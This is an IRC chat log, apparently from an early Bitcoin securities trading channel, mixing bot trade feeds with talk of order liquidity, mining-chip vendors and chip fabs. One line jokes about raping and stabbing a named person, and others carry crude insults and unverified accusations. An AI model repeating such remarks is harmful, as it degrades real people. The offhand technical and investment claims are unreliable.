of best practices or how to I can read? Sep 14 23:43:58 Concerning investments. Sep 14 23:46:45 [GLBSE] [FPGAMINING] 1 @ 0.6976 BTC [+] Sep 14 23:48:18 EskimoBob: people keep saying that, but it isn't margin Sep 14 23:48:25 my normal brokerage account does not have margin Sep 14 23:48:25 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 14 23:48:36 that doesn't mean i can't place a ton of bids on different things Sep 14 23:49:01 [GLBSE] [OBSI.HRPT] 20 @ 0.09949999 = 1.99 BTC [-] Sep 14 23:49:02 [GLBSE] [OBSI.HRPT] 4 @ 0.0995 = 0.398 BTC [+] Sep 14 23:49:04 [GLBSE] [OBSI.HRPT] 100 @ 0.09969946 = 9.9699 BTC [+] Sep 14 23:49:05 [GLBSE] [OBSI.HRPT] 100 @ 0.09969947 = 9.9699 BTC [+] Sep 14 23:49:06 [GLBSE] [OBSI.HRPT] 70 @ 0.09969999 = 6.979 BTC [+] Sep 14 23:49:07 [GLBSE] [OBSI.HRPT] 50 @ 0.0997 = 4.985 BTC [+] Sep 14 23:49:09 [GLBSE] [OBSI.HRPT] 141 @ 0.09989999 = 14.0859 BTC [+] Sep 14 23:49:09 [GLBSE] [OBSI.HRPT] 100 @ 0.0999 = 9.99 BTC [+] Sep 14 23:49:10 [GLBSE] [OBSI.HRPT] 99 @ 0.0999 = 9.8901 BTC [+] Sep 14 23:49:11 [GLBSE] [OBSI.HRPT] 44 @ 0.09999997 = 4.4 BTC [+] Sep 14 23:49:12 [GLBSE] [OBSI.HRPT] 20 @ 0.09999998 = 2 BTC [+] Sep 14 23:49:13 [GLBSE] [OBSI.HRPT] 252 @ 0.1 = 25.2 BTC [+] Sep 14 23:49:51 i believe that's the way it works now Sep 14 23:49:54 [MPEX] [S.MPOE] 1500 @ 0.00039885 = 0.5983 BTC [+] Sep 14 23:49:58 yes Sep 14 23:50:21 ive had a brokerage acct for approx 10 years Sep 14 23:50:25 it has always worked like that Sep 14 23:50:29 but it is a normal cash acct Sep 14 23:50:33 [MPEX] [O.BTCUSD.C120T] 816 @ 0.10803636 = 88.1577 BTC [+] Sep 14 23:50:37 [GLBSE] [OBSI.HRPT] 1107 @ 0.1 = 110.7 BTC [+] Sep 14 23:50:55 if the market goes where i want on a particular issue, the order executes Sep 14 23:51:15 if there there is no avail funds, for the next order, it simply does not execute Sep 14 23:51:21 and the bid is removed Sep 14 23:52:55 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 14 23:52:55 what do you mean by "smooth" Sep 14 23:54:16 the liquidty problem is caused by this, say i want to buy gigamining at .3 and bmmo at .04, i have 1 btc. i can place an order for 3 giga OR 25 bmmo, but not both. i have to lock my money into one thing that may never happen Sep 14 23:54:39 i should be able to bid on 10 different issues at a price i would be happy with Sep 14 23:54:49 thus creating liquidty on all those issues Sep 14 23:55:18 Smoovious: but they do have the funds for it Sep 14 23:55:37 teek : increasing the appeareance of liquidity moreover. Sep 14 23:56:17 [GLBSE] [FDBF] 3 @ 0.15 = 0.45 BTC [+] Sep 14 23:58:02 I'd like to put my coins somewhere but I'm feeling out of my depth. I don't suppose that anybody reviews all of the options out there? How did you get your start investing? Sep 14 23:59:00 Which is why if anyone lacks bids to sell off and wish to sell me at a discount, I'm available. Sep 14 23:59:09 OneMiner start small. see what works. Sep 15 00:00:04 i understand people are all bent out of shape on "fake" bids, but there is "order time" then there is "execution time" Sep 15 00:00:09 credit is checked at both points Sep 15 00:00:23 OneMiner: May I recommend BTC-BOND? Sep 15 00:00:25 it isnt really the appearance Sep 15 00:00:48 it is real liquidty, because the order is standing based on money that is there when it was placed Sep 15 00:01:04 [GLBSE] [GSDPT] 10242 @ 0.0034 = 34.8228 BTC [+] Sep 15 00:01:08 haha Sep 15 00:01:27 [GLBSE] [HYDRO.BONDS] 2 @ 1.4296 = 2.8592 BTC [+] Sep 15 00:01:29 the first time you sell 10k into whart seems like a 40k wall and discover abotu 8k of it was valid you'll change your oppinion i guess Sep 15 00:02:43 [GLBSE] [GSDPT] 1176 @ 0.0034 = 3.9984 BTC [+] Sep 15 00:03:35 BTC-BOND is investing made easy. Less risk, stable profit, albeit lower profits. Sep 15 00:03:45 no one is going to provide any serious liquidty if they have to tie up their moeny for something that will probably never happen at 0% interest Sep 15 00:03:47 so yeah Sep 15 00:03:50 catch 22 sure Sep 15 00:03:59 but thats one of the reasons why Sep 15 00:04:21 Thanks for the tips guys. Sep 15 00:04:35 teek glbse liquidity was in the bucket before, this won't save it. but anyway, largely academic debate. Sep 15 00:04:51 Smoovious: if there is enough credit left to cover the order then it stays up, if not it gets canceled Sep 15 00:05:06 EskimoBob: you mean disable any open order under x BTC total? Sep 15 00:05:48 [17:03] and all the small bull shit orders have to be "moved" to market orders only Sep 15 00:05:55 EskimoBob I have to agree, that's the one thing I've considered and rejected. Hashrate is going up so fixed Mh/s is garbage. Sep 15 00:06:03 if i have orders up on 10 different stocks for 10@1 and for antoher 10 different stocks at 5@1 and i ahve 7 btc left in the account, all the 10@1's get canceled Sep 15 00:06:12 the first time one of the 5@1 gets filled the others cancel Sep 15 00:07:28 Smoovious: as far as i know the only reason it isnt implemented is a bug in the code Sep 15 00:09:28 CPA is trading above the reported the NAV now. Sep 15 00:09:42 reported NAV* Sep 15 00:09:49 Smoovious: i am fairly sure the real markets work like this.. though i am not a pro.. i supposed i could place some orders on some low volume issues and watch level 2 Sep 15 00:10:05 i know i have seen my orders on level 2 before and can follow them around Sep 15 00:10:10 What nefario needs to do is include a toggle for this in the settings. Sep 15 00:10:25 If you want strict bids, toggle for that Sep 15 00:10:31 If you want unlimited, toggle for that Sep 15 00:10:35 Everybody is happy Sep 15 00:11:16 Smoovious: fair enough.. but when i place orders in my brokerage account, i have seen them get routed directly to level 2 before Sep 15 00:11:24 now is it every and all orders Sep 15 00:11:26 i am not sure Sep 15 00:11:31 on stuff with high volume it is hard to follow Sep 15 00:12:21 No one would have GLBSE stocks they need to dump? I see dumpings going much lower than what I'd pay all the time. Sep 15 00:12:35 I got capital to spend. Sep 15 00:12:41 BTC-Mining: i'd dump jlp-bmd Sep 15 00:13:08 !ticker F.GIGA.ETF Sep 15 00:13:09 [MPEX:F.GIGA.ETF] 1day: 0.00041282 / 0.00044627 / 0.000485 (129315 shares, 57.71 BTC), 30day: 0.00030644 / 0.00076876 / 0.00113797 (13924752 shares, 10,704.86 BTC) Sep 15 00:13:15 is that a fixed mhash/s bond that won't upgrade to ASIC? Sep 15 00:13:28 no its a share, but i dont know wtf he is doing Sep 15 00:14:46 !ticker CPA Sep 15 00:14:53 !pl CPA 1 Sep 15 00:14:54 [GLBSE:CPA] [Bid: 0.03100101] [Ask: 0.033] [Spread: 0.00199899] [Last: 0.033] [24hVol: 2.67099981] [7dAvg: 0.02895127] Sep 15 00:14:54 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 15 00:14:59 CPA [1@1BTC] paid: 0.00569688 BTC. Last price: 0.033 BTC. Capital gain: -0.967 BTC. Total: -0.96130312 BTC. (-96.1%) Sep 15 00:15:18 Yep, I think we've hit the floor of CPA Sep 15 00:15:29 I think the liquidity problem is due to 500,000 bitcoins disappearing from people that would be potential investors in real bitcoin securities Sep 15 00:15:34 It's up from here from my talks with the issuer. Sep 15 00:15:41 [MPEX] [S.MPOE] 11850 @ 0.00039652 = 4.6988 BTC [-] Sep 15 00:15:42 [MPEX] [S.MPOE] 1551 @ 0.00039528 = 0.6131 BTC [-] Sep 15 00:16:06 eh, looks like a mining share but no real information Sep 15 00:16:13 [GLBSE] [OBSI.HRPT] 6 @ 0.09999996 = 0.6 BTC [-] Sep 15 00:16:42 I have GLBSE stocks I want to dump, when I went on a buying spree upon account creation without doing enough DD> Sep 15 00:17:01 Stuck in the positions Sep 15 00:17:14 So dodgy I wouldn't give much for them. Sep 15 00:17:24 What positions, Bugpowder? Sep 15 00:17:33 Hoping pre-dividend bounces get me out Sep 15 00:18:16 YAMBC, BTC-MINING, for example :) Sep 15 00:19:00 Hey... BTC-MINING kept it's value at least. There's just no bids eh. Sep 15 00:19:15 yeah thats because hope sells Sep 15 00:19:26 lol Sep 15 00:19:27 at least when it still has dividends Sep 15 00:20:02 GIGA @0.4 seems like the buy, but I have so much already Sep 15 00:20:06 Well it does pays and unless BITBOND defaults on the loan, the capital is still available at 1 BTC per BTC-MINING share. Sep 15 00:20:46 I like that BTC-Mining is still paying dividends instead of keeping capital tied up in vaporware waiting Sep 15 00:21:15 i'm paying dividends and have money tied up in vaporware :p Sep 15 00:21:49 We haven't enough raised for buying a full rig (didn't want to pay for singles) Sep 15 00:22:28 Smoovious that might be better suited for #bitcoin-politics Sep 15 00:22:29 And the ASICs weren't out yet (vaporware) and other competing offers were on the horizon. So put a motion and started loaning the funds. Sep 15 00:23:38 ASICs still aren't out yet. Sep 15 00:24:00 Aye, and sorry gigavps about being so inquisitive and critical about your upgrade path. It's just that I think, although you have to plan for worst case scenario to still be able to cover the hashing, unless/until this scenario happens, you're putting a large amount of coins in your pockets. Sep 15 00:24:01 Any estimate of total TH ordered? Sep 15 00:24:11 Smoovious everything go ok? Sep 15 00:24:13 30TH on the thread... Sep 15 00:24:35 Bugpowder i would think it's much higher than that Sep 15 00:25:45 so they caught it in time? Sep 15 00:26:41 The main annoyance with the liquidity is that I need to reserve sufficient capital to pay GIGA upgrade fee, because who knows how much you lose getting out of other positions to cover the fee on the day the exchange program goes into effect. Sep 15 00:26:59 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 15 00:27:04 CPA [1@0.1BTC] paid: 0.00569688 BTC. Last price: 0.033 BTC. Capital gain: -0.067 BTC. Total: -0.06130312 BTC. (-61.3%) Sep 15 00:27:20 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 15 00:27:32 GIGAMINING [1@1.5BTC] paid: 0.44317596 BTC. Last price: 0.62 BTC. Capital gain: -0.88 BTC. Total: -0.43682404 BTC. (-29.1%) Sep 15 00:27:51 Bugpowder asic is going to be fun Sep 15 00:28:03 [GLBSE] [GREEN] 3 @ 0.61 = 1.83 BTC [+] Sep 15 00:28:15 of all the asic offerings, i don't think anyone is going to be able to compete with BFL Sep 15 00:28:32 It takes serious expertise to roll out custom silicon Sep 15 00:29:36 FPGA is not the same difficulty level Sep 15 00:30:59 ALSO much more preorder capital Sep 15 00:31:00 [GLBSE] [BIF.1YR.LOAN] 5 @ 0.92307692 = 4.6154 BTC [+] Sep 15 00:31:02 [GLBSE] [BIF.1YR.LOAN] 5 @ 0.94230769 = 4.7115 BTC [+] Sep 15 00:31:03 [GLBSE] [BIF.1YR.LOAN] 5 @ 0.96153846 = 4.8077 BTC [+] Sep 15 00:31:03 I would guess Sep 15 00:31:03 [GLBSE] [BIF.1YR.LOAN] 8 @ 0.98 = 7.84 BTC [+] Sep 15 00:31:04 [GLBSE] [BIF.1YR.LOAN] 3 @ 0.98076923 = 2.9423 BTC [+] Sep 15 00:31:36 [05:30:30] the 1 major advantage BFL has right now, is it is very likely to be the first to market with them Sep 15 00:31:43 I doubt that Sep 15 00:31:48 i'm also wondering how btcfpga when from not having a fab one week to having a fab and "in process" the next week Sep 15 00:31:58 [GLBSE] [V.HRL] 1 @ 0.9989 BTC [-] Sep 15 00:32:00 [GLBSE] [V.HRL] 4 @ 0.999 = 3.996 BTC [+] Sep 15 00:32:01 [GLBSE] [V.HRL] 5 @ 0.9995 = 4.9975 BTC [+] Sep 15 00:32:06 Smoovious: asicminer Sep 15 00:32:19 I believe bfl will miss the october launch date Sep 15 00:32:19 asicminer has shown their specs Sep 15 00:32:28 and they are not great Sep 15 00:32:37 8w for 1Gh Sep 15 00:32:47 gigavps: the 1th for 500w figure is wrong Sep 15 00:32:48 and tycho Sep 15 00:33:00 i thought bfl had a november date. Sep 15 00:33:08 Smoovious: they will have the units mining by december if they meet their launch date Sep 15 00:33:13 mircea_popescu: no, october Sep 15 00:33:22 Diablo-D3 who said anything about 1Th for 500w Sep 15 00:33:29 gigavps: thats asicminer's numbers Sep 15 00:33:38 mircea_popescu end of october Sep 15 00:33:42 Diablo-D3 i don't think he puts more stock in asicminer. Sep 15 00:33:50 Diablo-D3 are you smoking crack? Sep 15 00:33:51 gigavps well the guys likes to contradict what can i say :p Sep 15 00:33:57 gigavps: wait, I might be Sep 15 00:34:11 lemme check the thread Sep 15 00:34:41 gigavps: Scaling up from 3.5GH for 1 USB jalapeno gives an upper bound for pure-chip power requirements for 1TH ~600W, plus infrastructure, fans, controllers whatever else they're putting in the sc minirig. Sep 15 00:34:43 sorry, 50gh for 532 watts Sep 15 00:35:02 bfl sc is claiming 50 for 100 Sep 15 00:35:17 and asicminer has already said the 532 figure is wrong, they'll be coming in much lower Sep 15 00:35:17 Diablo-D3: Sorry what? Sep 15 00:35:30 midnightmagic: 40 for 85 ~= 50 for 100 Sep 15 00:35:37 ah Sep 15 00:35:55 and no one believes bfl's numbers Sep 15 00:36:00 Diablo-D3: Where's the 85W figure? Is that posted by BFL somewhere? Sep 15 00:36:14 midnightmagic: they said their sc single will use as much as the single Sep 15 00:36:27 same with sc minirig vs minirig Sep 15 00:36:39 Diablo-D3: Well, even if it's twice that, or three times that, so long as they fit on a 20A circuit, I'm fine with that. Sep 15 00:36:54 Diablo-D3: !! Well that's interesting. I haven't read that. Sep 15 00:36:56 twice that on a minirig still fits on a 15 Sep 15 00:37:37 anyhow, 50th for 532 (which has already been announced as too high as an early estimate) vs 50th on 100 Sep 15 00:37:47 so even if asicminer is 50th on 200, they won Sep 15 00:37:49 Diablo-D3: I specifically wired up with 12/3, 20A plugs, full armoured conduit, nothing inside the walls, to accommodate future power requirements. We'll see! heh heh. Sep 15 00:38:24 the problem is this Sep 15 00:38:28 the chinese new year Sep 15 00:38:40 is when BFL will ship Sep 15 00:38:42 if the finished boards have not arrived by jan, NOBODY gets anything until late feb Sep 15 00:38:48 the _start_ of jan Sep 15 00:38:59 bfl says october, they wont make it Sep 15 00:39:10 asicminer says nov or dec, they are cutting it close but will make it Sep 15 00:39:27 aiscminer had to bust their asses to catch up to bfl's unverified lead Sep 15 00:39:45 missile gap Sep 15 00:39:50 asicminer is one of those companies that you dont want to know how the sausage is made Sep 15 00:40:26 Diablo-D3 i'm an almost positive that ASICMINER specs are at 8w/Gh Sep 15 00:40:41 and 8kW per Th Sep 15 00:41:00 they are using a very inefficient nm size Sep 15 00:41:03 at 130nm Sep 15 00:41:10 8kw ?! Sep 15 00:41:18 jesus that's some heavy duty draw. Sep 15 00:41:28 gigavps: yes, its 130nm Sep 15 00:41:37 but so is bfl Sep 15 00:41:45 [MPEX] [F.GIGA.ETF] 7020 @ 0.00041923 = 2.943 BTC [+] Sep 15 00:41:45 didn't they claim 80 ? Sep 15 00:41:45 unless they went the altera sasic 65nm route Sep 15 00:41:46 [MPEX] [F.GIGA.ETF] 3880 @ 0.00041927 = 1.6268 BTC [+] Sep 15 00:41:55 mircea_popescu: er, 80 isnt a size Sep 15 00:42:23 76 we Sep 15 00:42:25 Diablo-D3 how do you know bfl is on 130nm? Sep 15 00:42:43 gigavps: because its all they can afford Sep 15 00:42:53 Diablo-D3 how do you know that? Sep 15 00:43:02 unless they got VERY lucky to get a shared silicon 65nm run, they wont be on 65nm Sep 15 00:43:07 gigavps: minimum silicon orders Sep 15 00:43:12 you look at their bank account? Sep 15 00:43:15 65 still has them, small wafer size 130s dont Sep 15 00:43:19 gigavps: okay fine Sep 15 00:43:24 unless they had 10 million in the bank Sep 15 00:43:28 they cant afford it Sep 15 00:43:39 Diablo-D3 you are speaking as if you know something Sep 15 00:43:43 if they had 10 million in the bank they could afford a PR firm to stop fucking up shit as well Sep 15 00:43:50 their PR still sucks. Sep 15 00:43:52 when in reality, you don't Sep 15 00:44:01 so Im just putting 1 and 1 together to get 2 here. Sep 15 00:45:06 gigavps: bfl got caught lying about specs before Sep 15 00:45:20 plus they asked for investor money up front Sep 15 00:45:28 and you have to pay for the entire run up front Sep 15 00:45:46 usagi: exactly, and if they miss the october launch date, asicminer wins Sep 15 00:46:29 If asicminer will succeed, thats the question, I dont believe it Sep 15 00:46:50 chinese crap Sep 15 00:47:07 PsychoticBoy: its ALL chinese crap Sep 15 00:47:13 where do you think almost all the world's chip fabs are Sep 15 00:47:14 in CHINA Sep 15 00:47:27 usagi: the republic of china. Sep 15 00:47:35 so you're not helping your case Sep 15 00:47:42 I dont care about your political issues either Sep 15 00:48:02 yes, Im aware that 98% of the world's memory is produced in taiwan. Sep 15 00:48:21 Im also aware most non-memory storage devices are made there Sep 15 00:48:24 yes but they forgot yours Sep 15 00:48:37 theres also two major industrial fan manufacturers there Sep 15 00:49:24 usagi: but Ill also remind you taiwan is not recognized by the UN and their seat is held by China. Sep 15 00:49:37 so lolpolitics, it doesnt belong here. Sep 15 00:50:37 usagi: there are no 130nm and 65nm fabs in the US afaik Sep 15 00:50:39 which is the big issue Sep 15 00:50:44 I'd rather the chips be fabbed here Sep 15 00:52:19 oh hey Sep 15 00:52:20 Im wrong Sep 15 00:52:33 intel still does 65nm at the fab in chandler az Sep 15 00:52:51 IBM? Sep 15 00:53:13 intel has four fabs in the US, hillsboro or, chandler az, rio rancho nm, and hudson ma Sep 15 00:53:29 http://download.intel.com/newsroom/kits/22nm/pdfs/Global-Intel-Manufacturing_FactSheet.pdf Sep 15 00:53:30 all of them do 22, 32, or 45, and chandler is building a 14nm fab Sep 15 00:53:47 Costa Rica! Sep 15 00:54:08 intel also has a fab in ireland, does 65 and 90, one in israel doing 45, and one in china doing 65 for non-security applications Sep 15 00:54:46 amd/globalfoundries has one in germany, does 45nm and will also be the site of their next gen stuff Sep 15 00:54:57 gf's singapore site still does basically every size ever Sep 15 00:55:20 28, 180, 350, and 600 (holy shit they still have a 600nm plant open) Sep 15 00:55:49 gf is opening one in abu dhabi in 2015 as well Sep 15 00:56:15 tsmc has two different plants in taiwan, they do a bunch of sizes including 65 and 130, plus one in shanghai Sep 15 00:56:15 Israel is actually producing something? Sep 15 00:56:25 sorry, three in taiwan Sep 15 00:56:36 Bane_Capital: yes, intel israel is a huge r&d facility Sep 15 00:56:39 Bane_Capital bdk_kluge bitfoo bonks brbot BTC-Mining BTCHero Bugpowder Sep 15 00:56:50 Bane_Capital they're producing hot chicks in uniform at an amazing rate. Sep 15 00:56:59 mircea Sep 15 00:57:10 ibm ha two fabs in the US, fishkill ny and essex junction vt, but I dont know what sizes Sep 15 00:57:13 Forced conscription really bums me out. Sep 15 00:57:21 [GLBSE] [OBSI.HRPT] 25 @ 0.09989999 = 2.4975 BTC [-] Sep 15 00:57:36 stm has one in france, one in italy, 32, 45, 65, 90 Sep 15 00:58:10 freescale has one in austin and chandler doing larger sizes, but no 65 and 130 from what I see Sep 15 00:58:48 smic is in shanghai and beijing and tianjin, 45, 65, 90, 130 Sep 15 00:59:03 holy fuck Sep 15 00:59:04 [GLBSE] [BFLS] 4 @ 0.75 = 3 BTC [+] Sep 15 00:59:05 I didnt know this Sep 15 00:59:12 natsemi has a fab plant in maine Sep 15 00:59:22 that cant be possible Sep 15 00:59:25 Can these guys make ASICs? Sep 15 00:59:44 Bane_Capital: these are all chip fabs Sep 15 00:59:53 they can make anything if you supply them with the mask. Sep 15 00:59:57 FISHKILL was 65nm in 2005 Sep 15 01:00:12 Bugpowder: ibm has sub-22nm processes Sep 15 01:00:16 but I dont know which fab has it Sep 15 01:00:24 er, WILL have sub-22 Sep 15 01:00:45 Bane_Capital: natsemi in portland me only does 180, 250, and 350 Sep 15 01:00:56 So were do these guys do the bonding and packaging of the silicon Sep 15 01:00:57 ? Sep 15 01:01:06 Bugpowder: some do, some dont Sep 15 01:01:26 a lot of companies offer packaging as well so you dont have to go off site to do it Sep 15 01:01:45 The biggest issue we had with our custom silicon probes was the bump soldering to each lead Sep 15 01:02:18 hundreds of probes, all with a few bad channels Sep 15 01:02:23 from the bonding Sep 15 01:02:30 ouch Sep 15 01:02:57 It literally took 2 years to go from working prototype to successful production run Sep 15 01:03:00 [GLBSE] [BDK.BND] 17 @ 0.09 = 1.53 BTC [-] Sep 15 01:03:04 man, multiple companies have fabs in austin Sep 15 01:03:05 smaller budget though. Sep 15 01:03:07 why Sep 15 01:03:19 I wonder if thats all the same fab and it either changed hands or works for multiple companies Sep 15 01:03:35 Bugpowder: yeah, that really sucks Sep 15 01:03:40 vendors say they can do the spec sheet. they cant do the spec sheet Sep 15 01:03:50 switch vendors Sep 15 01:04:04 gigavps: anyhow, what I was saying was, Im not saying bfl cant do it Sep 15 01:04:11 gigavps: there is just a lot of evidence against them Sep 15 01:04:15 flex PCB shortage Sep 15 01:04:16 etc Sep 15 01:05:04 switch from flip chip to zif connectors Sep 15 01:07:57 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:08:33 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:08:58 [MPEX] [S.MPOE] 26800 @ 0.00039538 = 10.5962 BTC [+] Sep 15 01:09:56 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:10:10 !ticker FDBF Sep 15 01:10:14 !ticker ABM Sep 15 01:10:34 [GLBSE:FDBF] [Bid: 0.146] [Ask: 0.15] [Spread: 0.004] [Last: 0.15] [24hVol: 6.45] [7dAvg: 0.14999999] Sep 15 01:10:38 [GLBSE:ABM] [Bid: 0.085] [Ask: 0.16] [Spread: 0.075] [Last: 0.1] [24hVol: ] [7dAvg: 0.1] Sep 15 01:11:26 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:11:49 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:12:00 Bugpowder: yeah well Sep 15 01:12:05 at least asicminer is making a normal chip Sep 15 01:12:17 [GLBSE] [OBSI.HRPT] 1 @ 0.09989999 BTC [-] Sep 15 01:12:19 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:12:34 and I think the way they've set it up even if it has a few bad sha cores it should still work Sep 15 01:12:41 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:13:14 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:13:28 I'm making sure my mining investments will still be paying out during the wait Sep 15 01:13:32 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:13:40 well Sep 15 01:13:43 who the fuck is buying 10 share lots of GSDPT Sep 15 01:13:49 who knows Sep 15 01:13:51 silly people Sep 15 01:13:54 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 15 01:14:31 i've seen 1 share lots Sep 15 01:14:40 There is a nice gap in the CPA asks. Sep 15 01:14:43 I want to clear it Sep 15 01:14:48 but I don't have the leverage Sep 15 01:14:58 SOMEBODY BUY IT UP TO .034 Sep 15 01:14:59 [MPEX] [S.BVPS] 350 @ 0.00332368 = 1.1633 BTC [-] Sep 15 01:15:00 Yeah, it like baby's first fund management. https://docs.google.com/spreadsheet/ccc?key=0AnpbJ9eMVdSodHYyVVNHUVh2OEtVYWd6NDFoY0pCalE#gid=0 Sep 15 01:15:00 [MPEX] [S.BVPS] 450 @ 0.00319321 = 1.4369 BTC [-] Sep 15 01:15:31 "Bought shares of gigamining(2), cognitive(4), synergy(10), and pajka(16). Paid 1st dividend. Have 4.14659601 BTC in reserve funds. See other sheets for more details." Sep 15 01:15:41 !ticker s.bvps Sep 15 01:15:41 lol Sep 15 01:15:43 [MPEX:S.BVPS] 1day: 0.00319321 / 0.00329319 / 0.00337901 (1200 shares, 3.95 BTC), 30day: 0.00319321 / 0.00361552 / 0.00389519 (46597 shares, 168.47 BTC) Sep 15 01:16:09 hrm Sep 15 01:16:14 does bitcoin have an accounting company? Sep 15 01:16:30 smickles lol. Sep 15 01:16:31 <[\\\]> yeah, smickles ;) Sep 15 01:16:43 get in line slashy :D Sep 15 01:16:52 thats imsaguy Sep 15 01:16:53 <[\\\]> bitch, he's already on my payroll Sep 15 01:16:58 <[\\\]> ;;ident Sep 15 01:16:59 You are identified as user imsaguy, with GPG key id 7D7EA76776E6CE48, key fingerprint A1398F4C58AC3D387F012AFA7D7EA76776E6CE48, and bitcoin address 1Hf5qWZzd2WsrDwLhkykNc4uXPAkykg9PM Sep 15 01:17:20 how much does smickles, smickles, and smickles cost to hire? Sep 15 01:17:36 Over 9001 Satoshis Sep 15 01:17:39 per minute Sep 15 01:17:43 <[\\\]> 2 hookers and a ball of tar Sep 15 01:17:54 those are pretty expensive hookers Sep 15 01:18:12 [GLBSE] [GREEN] 1 @ 0.7 BTC [+] Sep 15 01:18:21 It's funny how people are willing to call out my alt accounts Sep 15 01:18:24 [MPEX] [F.GIGA.ETF] 7720 @ 0.00041927 = 3.2368 BTC [+] Sep 15 01:18:25 [MPEX] [F.GIGA.ETF] 5500 @ 0.00042382 = 2.331 BTC [+] Sep 15 01:18:25 then not lend to me Sep 15 01:18:26 [MPEX] [F.GIGA.ETF] 1900 @ 0.00042671 = 0.8107 BTC [+] Sep 15 01:18:27 [MPEX] [F.GIGA.ETF] 1200 @ 0.0004272 = 0.5126 BTC [+] Sep 15 01:18:28 [MPEX] [F.GIGA.ETF] 36378 @ 0.00045386 = 16.5105 BTC [+] Sep 15 01:18:30 [MPEX] [F.GIGA.ETF] 2302 @ 0.00047591 = 1.0955 BTC [+] Sep 15 01:18:31 becuase their not sure I am Atlas Sep 15 01:18:49 Anyways, fuck it. I don't need a stinkin loan. Sep 15 01:19:07 you gonna buy shit with your aggregated postcount ? Sep 15 01:20:01 I have gotten thousand BTC loans before Sep 15 01:20:05 through post count alone Sep 15 01:20:19 ya but the citizen-bankers are a little broke atm. Sep 15 01:20:20 Never bothered to document them though Sep 15 01:20:36 because they are silly. Sep 15 01:20:43 lending to 15 year olds Sep 15 01:20:59 [MPEX] [O.BTCUSD.P100N] 1 @ 0.18455089 BTC [+] Sep 15 01:21:38 dude srsly. kludge is not 15. it was a joke. Sep 15 01:22:56 HashKing is Sep 15 01:23:00 I am quite certain Sep 15 01:23:03 <[\\\]> no, he isn't Sep 15 01:23:07 <[\\\]> i know that for a fact. Sep 15 01:23:15 Well Sep 15 01:23:18 I know nothing Sep 15 01:23:24 <[\\\]> can we get all the other fud out of the way too? Sep 15 01:24:21 o it was hk not kludge nm. but yes, he said that as a joke Sep 15 01:24:26 people ran with it, it's ridiculous. Sep 15 01:24:28 Diablo-D3 is a transgendered, atheist, scientologist. Sep 15 01:24:46 Bane_Capital: not true Sep 15 01:24:54 wait Sep 15 01:24:54 what? Sep 15 01:25:00 how can I be atheist AND scientologist? Sep 15 01:25:13 Thetans told me so. Sep 15 01:25:14 either I do not believe in God, or I worship a grey wearing a cloak and a crown Sep 15 01:25:21 cant have both Sep 15 01:33:48 [GLBSE] [ASICMINER] 2 @ 0.11968987 = 0.2394 BTC [+] Sep 15 01:48:58 [MPEX] [S.MPOE] 60200 @ 0.00039528 = 23.7959 BTC [-] Sep 15 01:54:40 Diablo-D3: false, you can be atheist AND worship a persona in a ridicule fashion, as to mock sects (aka fake or set-up worshipping) Sep 15 01:55:03 BTC-Mining: but thats not religious, its entertainment Sep 15 01:55:41 unicode even has a form of the ikon Sep 15 01:57:01 [GLBSE] [OBSI.HRPT] 2 @ 0.09989999 = 0.1998 BTC [-] Sep 15 01:57:45 I remember back in high school... where normal people would walk with friends talking, I'd be followed by my two atheists friends who've decided to worship me AND go on strike demanding higher salaries for the disciples of this sect having 2 followers. Sep 15 01:58:57 Try walking around corridors with two people walking around you like their on strike demanding higher salaries >.> Sep 15 02:01:03 [GLBSE] [OBSI.HRPT] 49 @ 0.09989999 = 4.8951 BTC [-] Sep 15 02:01:34 BTC-Mining: your high school life was more exciting than mine Sep 15 02:01:39 or giving you the hitler salute. Or walking around you doing freestyle rap, but not in a serious way. Sep 15 02:02:21 also, someone has notified me that people actually went to the bitcoinica conference Sep 15 02:02:23 _why_ Sep 15 02:02:31 It was entertaining. They're very good friends too. Sep 15 02:02:57 [GLBSE] [BBBB] 5 @ 0.0002 = 0.001 BTC [+] Sep 15 02:03:57 [GLBSE] [GREEN] 2 @ 0.7 = 1.4 BTC [+] Sep 15 02:04:58 Luckily life is not like american tv shows. Or we'd have been beaten up so many times. =P Sep 15 02:05:38 I miss being a student. Sep 15 02:11:39 i don't miss being a student. Sep 15 02:11:43 had a lot less money back then. Sep 15 02:12:20 [GLBSE] [HYDRO.BONDS] 2 @ 1.4299 = 2.8598 BTC [+] Sep 15 02:13:57 Eh, that's the worst part. Sep 15 02:16:04 oh man Sep 15 02:16:06 so tired Sep 15 02:16:20 Anyone see the twit pics from the dinner at the pre event? Sep 15 02:16:30 why did you go to that event? Sep 15 02:16:36 [GLBSE] [FDBF] 2 @ 0.146 = 0.292 BTC [-] Sep 15 02:16:38 it just legitimizes what those guys did Sep 15 02:16:44 what guys Sep 15 02:16:57 bitcoinica and intersango Sep 15 02:17:13 Why would I NOT go Sep 15 02:17:18 everyone is there Sep 15 02:17:22 it's awesome Sep 15 02:17:23 and Sep 15 02:17:26 they had bitcake Sep 15 02:17:34 unless you were hoping zhou tong would show up so you could rape him in a back alley then stab him to death, I dont see the point Sep 15 02:17:34 actual bitcoin cake Sep 15 02:17:41 which tastes like chocolate Sep 15 02:17:46 [GLBSE] [FUTUREFUND] 4 @ 0.00012682 = 0.0005 BTC [+] Sep 15 02:18:03 Such retardedness Sep 15 02:18:10 Head implodes Sep 15 02:19:48 I dunno, after the crap intersango did, I'd never go to an event they hosted Sep 15 02:20:34 Then you're missing out Sep 15 02:20:44 cause nearly everyone who is anyone has come Sep 15 02:20:58 [MPEX] 